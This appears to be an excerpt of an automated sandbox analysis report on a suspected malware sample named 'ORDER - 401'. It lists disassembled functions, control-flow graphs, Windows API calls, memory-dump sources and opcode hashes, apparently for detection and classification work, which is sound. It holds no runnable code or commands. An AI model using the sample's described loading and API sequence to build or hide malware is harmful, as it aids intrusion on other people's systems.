                                                                                  • Opcode ID: 4cfec5c2516249e954e41a1b4757ddce9eae1d259480cab5b9ae5c1bebeacb8b
                                                                                  • Instruction ID: 66fd4bdac885567653cee8e8737b90debcb65997f9d10d71016b5479287da828
                                                                                  • Opcode Fuzzy Hash: 4cfec5c2516249e954e41a1b4757ddce9eae1d259480cab5b9ae5c1bebeacb8b
                                                                                  • Instruction Fuzzy Hash: 407146B0A00B059FD764DF2AE45075ABBF6FF88308F00892ED54AD7A50DB35E946CB91
                                                                                  Function 023F58ED Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1178 23f58ed-23f59b9 CreateActCtxA 1180 23f59bb-23f59c1 1178->1180 1181 23f59c2-23f5a1c 1178->1181 1180->1181 1188 23f5a1e-23f5a21 1181->1188 1189 23f5a2b-23f5a2f 1181->1189 1188->1189 1190 23f5a31-23f5a3d 1189->1190 1191 23f5a40 1189->1191 1190->1191 1193 23f5a41 1191->1193 1193->1193
                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 023F59A9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2292712886.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_23f0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: 337fec68ac1dc27384c6dc53906762e7d6de11c9ea7153c5db91de575218c964
                                                                                  • Instruction ID: 5b95dd25aab0d7ead9ae66ff031438d457395c28578f8136d15b95ea79115ff2
                                                                                  • Opcode Fuzzy Hash: 337fec68ac1dc27384c6dc53906762e7d6de11c9ea7153c5db91de575218c964
                                                                                  • Instruction Fuzzy Hash: FF41E2B0C00719CBDB25CFA9C984B9EBBB6FF49304F60805AD419AB251DB75694ACF90
                                                                                  Function 04B61254 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1194 4b61254-4b642fc 1197 4b64302-4b64307 1194->1197 1198 4b643ac-4b643cc call 4b6112c 1194->1198 1199 4b6435a-4b64392 CallWindowProcW 1197->1199 1200 4b64309-4b64340 1197->1200 1205 4b643cf-4b643dc 1198->1205 1202 4b64394-4b6439a 1199->1202 1203 4b6439b-4b643aa 1199->1203 1208 4b64342-4b64348 1200->1208 1209 4b64349-4b64358 1200->1209 1202->1203 1203->1205 1208->1209 1209->1205
                                                                                  APIs
                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 04B64381
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2295332344.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4b60000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallProcWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2714655100-0
                                                                                  • Opcode ID: 8b5371dc70663bd4250fd58e26cf7fc7b29e5f52f581d3181dd78eda5f04dfd3
                                                                                  • Instruction ID: f78cbdcdcd6dfe51d3e98a0831fdb230f764917406e518c87ec5832c0c50870f
                                                                                  • Opcode Fuzzy Hash: 8b5371dc70663bd4250fd58e26cf7fc7b29e5f52f581d3181dd78eda5f04dfd3
                                                                                  • Instruction Fuzzy Hash: CB4147B5A00705DFDB14CF99C488AAABBF5FF88314F24C499D519AB321D378A841CBA4
                                                                                  Function 023F4514 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1211 23f4514-23f59b9 CreateActCtxA 1214 23f59bb-23f59c1 1211->1214 1215 23f59c2-23f5a1c 1211->1215 1214->1215 1222 23f5a1e-23f5a21 1215->1222 1223 23f5a2b-23f5a2f 1215->1223 1222->1223 1224 23f5a31-23f5a3d 1223->1224 1225 23f5a40 1223->1225 1224->1225 1227 23f5a41 1225->1227 1227->1227
                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 023F59A9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2292712886.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_23f0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: 74dd324f97dc131e6cc8d7fd4d439b80dce0a39a20e03a4f474feabb1fce9a71
                                                                                  • Instruction ID: 8f3994bb00d4894737979bcc119090dda82d36cdeaee8c3585f11e14759f9c6f
                                                                                  • Opcode Fuzzy Hash: 74dd324f97dc131e6cc8d7fd4d439b80dce0a39a20e03a4f474feabb1fce9a71
                                                                                  • Instruction Fuzzy Hash: 2541E2B0C00719CBDB24CFAAC984B9EBBF6BF48304F60806AD508AB251DB756945CF90
                                                                                  Function 023FD0F8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1228 23fd0f8-23fd61c DuplicateHandle 1230 23fd61e-23fd624 1228->1230 1231 23fd625-23fd642 1228->1231 1230->1231
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,023FD54E,?,?,?,?,?), ref: 023FD60F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2292712886.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_23f0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: d1dd8f6fe541308f5c2e97943359e8026b29347cd425b0972edd3b7dbf77cee0
                                                                                  • Instruction ID: 11750c58e8778838b43ebd1d533e8bcc8b6824e54258ebf0354fedd36adff5db
                                                                                  • Opcode Fuzzy Hash: d1dd8f6fe541308f5c2e97943359e8026b29347cd425b0972edd3b7dbf77cee0
                                                                                  • Instruction Fuzzy Hash: 1821E5B59002489FDB10CF9AD984ADEBBF8EB48314F14841AE918A7350D378A950CFA4
                                                                                  Function 023FD581 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1234 23fd581-23fd586 1235 23fd588-23fd61c DuplicateHandle 1234->1235 1236 23fd61e-23fd624 1235->1236 1237 23fd625-23fd642 1235->1237 1236->1237
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,023FD54E,?,?,?,?,?), ref: 023FD60F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2292712886.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_23f0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: ef7253d1f115156fca3d7beead9997d1c290dcff68915682304f01c5c44ecb2f
                                                                                  • Instruction ID: 42c1ba3f1aca916a3d9023159e59388a0d33d75b93fe29f7fd62d13bad18037b
                                                                                  • Opcode Fuzzy Hash: ef7253d1f115156fca3d7beead9997d1c290dcff68915682304f01c5c44ecb2f
                                                                                  • Instruction Fuzzy Hash: 2F21E6B5D002599FDB10CF9AD984ADEBBF8EB48324F14841AE918A7350D378A940CF64
                                                                                  Function 023FB298 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1240 23fb298-23fb2d8 1241 23fb2da-23fb2dd 1240->1241 1242 23fb2e0-23fb30b GetModuleHandleW 1240->1242 1241->1242 1243 23fb30d-23fb313 1242->1243 1244 23fb314-23fb328 1242->1244 1243->1244
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 023FB2FE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2292712886.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_23f0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: 4f7058e175f7a1c7051880a4c7d3779ccc953ffc98645d8d17c9ba84eeed8aaf
                                                                                  • Instruction ID: ff9e34d73c6d0789315b7bcc56c9ee426253c95f221adc2af315bf28d3a7eb97
                                                                                  • Opcode Fuzzy Hash: 4f7058e175f7a1c7051880a4c7d3779ccc953ffc98645d8d17c9ba84eeed8aaf
                                                                                  • Instruction Fuzzy Hash: E71110B5C002498FCB20CF9AD444BDEFBF9EF88328F10841AD519A7210C379A545CFA1
                                                                                  Function 074E11D1 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • PostMessageW.USER32(?,?,?,?), ref: 074E1235
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2297285517.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_74e0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost
                                                                                  • String ID:
                                                                                  • API String ID: 410705778-0
                                                                                  • Opcode ID: 02b2dc7ab394b366165d91fa0b3d1b6f94c0a7ae9ea1edd7479991a920e70b1f
                                                                                  • Instruction ID: 31e93dba91e9b6ce64e0f0c3745a1b90e2dbd413336b10e9090eb9062aa5f3c4
                                                                                  • Opcode Fuzzy Hash: 02b2dc7ab394b366165d91fa0b3d1b6f94c0a7ae9ea1edd7479991a920e70b1f
                                                                                  • Instruction Fuzzy Hash: 1F11B0B5800249DFDB20CF9AD985BDEFFF8EB48324F20841AE558A7650C775A544CFA1
                                                                                  Function 074E11D8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • PostMessageW.USER32(?,?,?,?), ref: 074E1235
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2297285517.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_74e0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost
                                                                                  • String ID:
                                                                                  • API String ID: 410705778-0
                                                                                  • Opcode ID: 86190305de317daccd77acca598afbcf6f55c03b9b017a8d6d66156543f5f4cb
                                                                                  • Instruction ID: 6e81976e1109296d17c0e3f350cc2398af3f008d8e7a879a0b9d0eed6ce19394
                                                                                  • Opcode Fuzzy Hash: 86190305de317daccd77acca598afbcf6f55c03b9b017a8d6d66156543f5f4cb
                                                                                  • Instruction Fuzzy Hash: 6011D0B5800349DFDB20CF9AD985BDEBBF8FB48324F20841AE518A7640C375A944CFA1
                                                                                  Function 008BD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2291802844.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8bd000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2b8f1cec6c4fb86b8e8593bdb692a365c1ff3afbd46cd20973f9bf1d14107111
                                                                                  • Instruction ID: c4c0f1afa9a8629f3015f432e3234e72ff52582fc3b267ac6442f18c34cf3714
                                                                                  • Opcode Fuzzy Hash: 2b8f1cec6c4fb86b8e8593bdb692a365c1ff3afbd46cd20973f9bf1d14107111
                                                                                  • Instruction Fuzzy Hash: 092145B1104304EFCB04DF04C9C0B66BF65FB98324F20C569E90A8B356D33AE846CBA6
                                                                                  Function 008CD01C Relevance: .1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2291843684.00000000008CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008CD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8cd000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 72805fa145b0c93919f0e81295b7798b4d637d3bc53708be03ae35542002b8c0
                                                                                  • Instruction ID: 0f3cf98a796a6e57f3718f816fc24896489a04ff3201eef88a80fdc59b2ceaf5
                                                                                  • Opcode Fuzzy Hash: 72805fa145b0c93919f0e81295b7798b4d637d3bc53708be03ae35542002b8c0
                                                                                  • Instruction Fuzzy Hash: BC21B0755047049FCB14EF18D580F26BB65FB84314F24C56DD94A8B256C33AD847CA61
                                                                                  Function 008CD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2291843684.00000000008CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008CD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8cd000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b81eb4da33c6587cba821d332bd7db5139235dda0ba35c92b99c1977fe145b4f
                                                                                  • Instruction ID: 8fa1fea0256ec801a73a77ed24765d3e251f1e9d7318134c9ff84899d6e3f477
                                                                                  • Opcode Fuzzy Hash: b81eb4da33c6587cba821d332bd7db5139235dda0ba35c92b99c1977fe145b4f
                                                                                  • Instruction Fuzzy Hash: FD21CFB1504304AFDB05EF14D9C0F26BBB5FB84318F24C97DE9498B292C33AE846CA61
                                                                                  Function 008BD3D3 Relevance: .1, Instructions: 56COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2291802844.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8bd000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                  • Instruction ID: fcd7a70bad9e07ddf182ea92313939ccf3077eb9902907cd1504ee089388f229
                                                                                  • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                  • Instruction Fuzzy Hash: 8A11DF72404340DFCB12CF00D5C0B56BF72FB94324F24C6A9D8094B656C33AE85ACBA2
                                                                                  Function 008CD1CF Relevance: .1, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2291843684.00000000008CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008CD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8cd000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                  • Instruction ID: cecb755ef2a03353696f48b0bb9603fceed3ed289ed504e8c8217d54eda899cd
                                                                                  • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                  • Instruction Fuzzy Hash: 26118B76504380DFDB16DF14D9C4B15BBB2FB84314F24C6AED8498B696C33AE84ACB61
                                                                                  Function 008CD017 Relevance: .1, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2291843684.00000000008CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008CD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8cd000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                  • Instruction ID: 901200583ba5bceb48ae77c43e382631a0034e0b6aab8e2d98defc7044981756
                                                                                  • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                  • Instruction Fuzzy Hash: D911BB75504780DFCB11DF18D5C4B15BBB2FB84314F24C6AED8498B656C33AD84ACBA2
                                                                                  Function 008BD745 Relevance: .0, Instructions: 45COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2291802844.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8bd000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7897f3877a63adb1f05ed8f575c82257c00186cbb0f43a256a57910322f5a47a
                                                                                  • Instruction ID: 847450f83e39e28a75a430c31e3828382bc24410bdb39581f85fc40c9458a75a
                                                                                  • Opcode Fuzzy Hash: 7897f3877a63adb1f05ed8f575c82257c00186cbb0f43a256a57910322f5a47a
                                                                                  • Instruction Fuzzy Hash: 6C012B71004344BAE7208F25CDC4BE6BFDCEF41364F18C51AED088A382EE399840C675
                                                                                  Function 008BD744 Relevance: .0, Instructions: 36COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2291802844.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8bd000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 082ee8f1c928e1dd26cf610fb6dab6e22e732b7f89f494f0156ae21aa342ab5a
                                                                                  • Instruction ID: 9fe85ee8c42e21e336205ba8c74773a33cc688bebaa0c9aa4b3576b06caf9ff7
                                                                                  • Opcode Fuzzy Hash: 082ee8f1c928e1dd26cf610fb6dab6e22e732b7f89f494f0156ae21aa342ab5a
                                                                                  • Instruction Fuzzy Hash: 84F06271404344AAE7208E15D9C4BA2FFD8EB51735F18C45AED088A286D6799844CBB5

                                                                                  Non-executed Functions

                                                                                  Function 04B60040 Relevance: .3, Instructions: 315COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2295332344.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4b60000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 683fdfcf62469ce881b6ea2ec73c90205e01df86324cf65109d8f8270496a33d
                                                                                  • Instruction ID: 6964d54d919d60a9d65a3206d4e48ce533741f0539cd77382edc84437a82dd68
                                                                                  • Opcode Fuzzy Hash: 683fdfcf62469ce881b6ea2ec73c90205e01df86324cf65109d8f8270496a33d
                                                                                  • Instruction Fuzzy Hash: E512A1B0D01745AAE756DF65E84C1893BA2FB6231CF904709D2612A2F6DBBC194BCFC4
                                                                                  Function 023FDE84 Relevance: .3, Instructions: 264COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2292712886.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_23f0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c10ca9676f2971f45a4f77ab4b275f319f8f7bfcae7e5cb2a08ec1a1bcf29623
                                                                                  • Instruction ID: 0f2528ec4cfa148daa804192ea8f82db60d5d5d2553efdc8909c97e14585e924
                                                                                  • Opcode Fuzzy Hash: c10ca9676f2971f45a4f77ab4b275f319f8f7bfcae7e5cb2a08ec1a1bcf29623
                                                                                  • Instruction Fuzzy Hash: 06A17032E003098FCF15DFB4D84499EB7B2FF94304B1545AAE905AB2A5DB75E945CF80
                                                                                  Function 04B60006 Relevance: .2, Instructions: 242COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2295332344.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4b60000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3151ff9d2e15c9aa00f2e8d11cf8d62c01bd12cc2870e0f38da860ee4489419e
                                                                                  • Instruction ID: 056781aeaceb80be527e60da6c9d08d612856623b78b4adb266752d48f81c68d
                                                                                  • Opcode Fuzzy Hash: 3151ff9d2e15c9aa00f2e8d11cf8d62c01bd12cc2870e0f38da860ee4489419e
                                                                                  • Instruction Fuzzy Hash: 51C105B0C01745ABD716DF65E8481897BB2FBA6328F904709D1616B2F6DBBC184BCF84

                                                                                  Execution Graph

                                                                                  Execution Coverage:1.2%
                                                                                  Dynamic/Decrypted Code Coverage:5.3%
                                                                                  Signature Coverage:8.3%
                                                                                  Total number of Nodes:132
                                                                                  Total number of Limit Nodes:9
                                                                                  execution_graph 90465 42c2c3 90466 42c2e0 90465->90466 90469 1052df0 LdrInitializeThunk 90466->90469 90467 42c308 90469->90467 90470 424fa3 90471 424fbf 90470->90471 90472 424fe7 90471->90472 90473 424ffb 90471->90473 90474 42ccb3 NtClose 90472->90474 90480 42ccb3 90473->90480 90476 424ff0 90474->90476 90477 425004 90483 42ee13 RtlAllocateHeap 90477->90483 90479 42500f 90481 42cccd 90480->90481 90482 42ccde NtClose 90481->90482 90482->90477 90483->90479 90582 425333 90583 42534c 90582->90583 90584 425394 90583->90584 90587 4253d4 90583->90587 90589 4253d9 90583->90589 90585 42ecf3 RtlFreeHeap 90584->90585 90586 4253a1 90585->90586 90588 42ecf3 RtlFreeHeap 90587->90588 90588->90589 90590 42fd93 90591 42fda3 90590->90591 90592 42fda9 90590->90592 90595 42edd3 90592->90595 90594 42fdcf 90598 42cfb3 90595->90598 90597 42edee 90597->90594 90599 42cfcd 90598->90599 90600 42cfde RtlAllocateHeap 90599->90600 90600->90597 90484 414063 90485 414082 90484->90485 90487 42cf23 90484->90487 90488 42cf40 90487->90488 90491 1052c70 LdrInitializeThunk 90488->90491 90489 42cf68 90489->90485 90491->90489 90601 4145d3 90602 4145ec 90601->90602 90607 417d83 90602->90607 90604 41460a 90605 414656 90604->90605 90606 414643 PostThreadMessageW 90604->90606 90606->90605 90608 417da7 90607->90608 90609 417de3 LdrLoadDll 90608->90609 90610 417dae 90608->90610 90609->90610 90610->90604 90611 41b893 90612 41b8d7 90611->90612 90613 41b8f8 90612->90613 90614 42ccb3 NtClose 90612->90614 90614->90613 90615 41ea93 90616 41eab9 90615->90616 90620 41ebad 90616->90620 90621 42fec3 90616->90621 90618 41eb4e 90619 42c313 LdrInitializeThunk 90618->90619 90618->90620 90619->90620 90622 42fe33 90621->90622 90623 42fe90 90622->90623 90624 42edd3 RtlAllocateHeap 90622->90624 90623->90618 90625 42fe6d 90624->90625 90626 42ecf3 RtlFreeHeap 90625->90626 90626->90623 90492 4019e4 90493 401a01 90492->90493 90496 430263 90493->90496 90499 42e8b3 90496->90499 90500 42e8d9 90499->90500 90511 407353 90500->90511 90502 42e8ef 90503 401a65 90502->90503 90514 41b6a3 90502->90514 90505 42e90e 90506 42e923 90505->90506 90529 42d053 90505->90529 90525 428853 90506->90525 90509 42e93d 90510 42d053 ExitProcess 90509->90510 90510->90503 90513 407360 90511->90513 90532 416a33 90511->90532 90513->90502 90515 41b6cf 90514->90515 90556 41b593 90515->90556 90518 41b714 90521 41b730 90518->90521 90523 42ccb3 NtClose 90518->90523 90519 41b6fc 90520 41b707 90519->90520 90522 42ccb3 NtClose 90519->90522 90520->90505 90521->90505 90522->90520 90524 41b726 90523->90524 90524->90505 90526 4288b5 90525->90526 90528 4288c2 90526->90528 90567 418bf3 90526->90567 90528->90509 90530 42d06d 90529->90530 90531 42d07e ExitProcess 90530->90531 90531->90506 90533 416a4d 90532->90533 90535 416a66 90533->90535 90536 42d6d3 90533->90536 90535->90513 90538 42d6ed 90536->90538 90537 42d71c 90537->90535 90538->90537 90543 42c313 90538->90543 90544 42c32d 90543->90544 90550 1052c0a 90544->90550 90545 42c359 90547 42ecf3 90545->90547 90553 42d003 90547->90553 90549 42d78c 90549->90535 90551 1052c11 90550->90551 90552 1052c1f LdrInitializeThunk 90550->90552 90551->90545 90552->90545 90554 42d01d 90553->90554 90555 42d02e RtlFreeHeap 90554->90555 90555->90549 90557 41b5ad 90556->90557 90561 41b689 90556->90561 90562 42c3b3 90557->90562 90560 42ccb3 NtClose 90560->90561 90561->90518 90561->90519 90563 42c3cd 90562->90563 90566 10535c0 LdrInitializeThunk 90563->90566 90564 41b67d 90564->90560 90566->90564 90569 418bf6 90567->90569 90568 41911b 90568->90528 90569->90568 90575 414243 90569->90575 90571 418d4a 90571->90568 90572 42ecf3 RtlFreeHeap 90571->90572 90573 418d62 90572->90573 90573->90568 90574 42d053 ExitProcess 90573->90574 90574->90568 90579 414263 90575->90579 90577 4142c2 90577->90571 90578 4142cc 90578->90571 90579->90578 90580 41b9b3 RtlFreeHeap LdrInitializeThunk 90579->90580 90580->90577 90627 419335 90628 42ccb3 NtClose 90627->90628 90629 41933f 90628->90629 90581 1052b60 LdrInitializeThunk

                                                                                  Executed Functions

                                                                                  Function 00417D83 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 253 417d83-417dac call 42f8d3 256 417db2-417dc0 call 42fed3 253->256 257 417dae-417db1 253->257 260 417dd0-417de1 call 42e383 256->260 261 417dc2-417dcd call 430173 256->261 266 417de3-417df7 LdrLoadDll 260->266 267 417dfa-417dfd 260->267 261->260 266->267
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417DF5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_ORDER - 401.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: 68a1343607c5a450f7786a2c1a825d0cce543795bf5a9c2a52c786633a32a0ce
                                                                                  • Instruction ID: 88b9ef28133dc456cab6c81c5f600716b01c30102915f9fd8f3ec612534eff34
                                                                                  • Opcode Fuzzy Hash: 68a1343607c5a450f7786a2c1a825d0cce543795bf5a9c2a52c786633a32a0ce
                                                                                  • Instruction Fuzzy Hash: 23011EB5E0020DABDF10DAE5DC42FEEB3789F54308F0081AAE90897241F635EB598B95
                                                                                  Function 0042CCB3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 278 42ccb3-42ccec call 404623 call 42dea3 NtClose
                                                                                  APIs
                                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CCE7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_ORDER - 401.jbxd
                                                                                  Yara matches
                                                                                  Similarity
